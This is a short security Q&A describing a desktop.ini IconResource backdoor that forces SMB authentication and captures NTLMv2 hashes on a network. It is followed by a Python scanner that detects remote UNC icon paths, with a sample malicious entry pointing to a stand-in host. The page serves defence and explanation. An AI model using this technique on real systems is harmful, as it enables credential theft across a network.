One Day Sec

How can an attacker implant a backdoor using folder icons to capture credentials across an entire network?

An attacker who already holds administrator privileges can edit the `desktop.ini` file of a widely used system folder (for example `C:\Program Files`) and add an `IconResource` entry that points at a fake file server under their control. When any user opens that folder, Explorer retrieves the icon from that server over SMB and the user's machine authenticates automatically, handing the attacker an NTLMv2 hash. The backdoor needs no additional files on disk and quietly affects every user who browses the folder. For a related method, see Penetration Techniques - Using netsh to Capture NTLMv2 Hash from File Server Connections.
Tags: NTLMv2 hash, backdoor, desktop.ini, administrator privileges, SMB
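A defender-side check for this backdoor, added here as an example and not part of the original Q&A: it parses `desktop.ini` contents and flags any `IconResource` or `IconFile` entry that points to a UNC path on a host outside an allow list, which is exactly the entry that forces the SMB connection described above. The host name `fileserver.example.internal`, the sample files and all function names are constructed for the example.

```python
import configparser
import os
from pathlib import Path

ICON_KEYS = {"iconresource", "iconfile"}  # [.ShellClassInfo] keys Explorer loads icons from

# Constructed samples (not from a real system). A UNC icon path makes Explorer open an
# SMB connection to the named host, and the client authenticates with NTLM to do so.
SUSPICIOUS_INI = r"""[.ShellClassInfo]
IconResource=\\fileserver.example.internal\share\folder.ico,0
"""
BENIGN_INI = r"""[.ShellClassInfo]
IconResource=%SystemRoot%\system32\shell32.dll,-4
"""

def find_remote_icon_refs(text, trusted_hosts=()):
    """Return one finding per icon entry that points to a UNC host not in trusted_hosts."""
    # Interpolation off: values such as %SystemRoot% contain '%' signs.
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(text)
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for section in cp.sections():
        for key, value in cp.items(section):  # configparser lowercases key names
            if key not in ICON_KEYS:
                continue
            path = (value or "").strip().strip('"')
            if not path.startswith("\\\\"):
                continue                      # local file or DLL resource, no SMB fetch
            host = path[2:].split("\\", 1)[0].lower()
            if host not in trusted:
                findings.append({"section": section, "key": key, "host": host, "path": path})
    return findings

def read_desktop_ini(path):
    """desktop.ini is frequently UTF-16 with a BOM; otherwise treat it as ANSI."""
    data = Path(path).read_bytes()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("cp1252", errors="replace")

def scan_tree(root, trusted_hosts=()):
    results = {}  # path of each flagged desktop.ini -> its findings
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() == "desktop.ini":
                full = os.path.join(dirpath, name)
                hits = find_remote_icon_refs(read_desktop_ini(full), trusted_hosts)
                if hits:
                    results[full] = hits
    return results
```

Run `scan_tree` against a folder such as the one named above with a DFS or file-server allow list; a hit on any other host is the indicator the text describes.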
